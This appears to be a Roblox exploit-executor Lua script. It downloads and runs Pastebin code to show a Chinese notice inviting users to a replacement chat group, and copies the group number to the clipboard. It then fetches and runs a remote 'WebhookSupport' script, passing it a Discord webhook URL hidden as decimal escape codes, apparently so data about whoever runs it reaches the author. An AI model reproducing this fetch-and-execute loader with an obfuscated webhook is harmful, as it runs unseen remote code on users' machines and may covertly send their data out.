local MessageBox = loadstring(game:HttpGet("https://pastebin.com/raw/6uBnwKW9"))()

MessageBox({Position = UDim2.new(0.5,0,0.5,0), Text = "XA：提示", Description = "由于主群聊已被封禁，请加入我们的二群 758609700", MessageBoxIcon = "Warning", MessageBoxButtons = "OK", Result = function(res)
   if res == "OK" then
       setclipboard("758609700")
       game.StarterGui:SetCore("SendNotification", {
           Title = "XA：提示",
           Text = "已复制到剪贴板",
       })
   end
end})

loadstring(game:HttpGet("https://raw.githubusercontent.com/XingFork/Scripts/refs/heads/main/WebhookSupport.lua"))("\104\116\116\112\115\58\47\47\100\105\115\99\111\114\100\46\99\111\109\47\97\112\105\47\119\101\98\104\111\111\107\115\47\49\50\51\53\52\53\57\56\51\48\51\49\49\57\52\56\51\48\56\47\122\106\121\50\111\112\49\103\114\122\53\54\107\97\45\112\71\56\71\118\98\84\74\51\55\115\74\78\120\85\87\78\121\81\104\97\83\86\66\122\48\48\101\51\48\80\102\48\113\102\57\109\69\116\106\113\116\70\49\99\88\118\76\104\118\99\85\114")
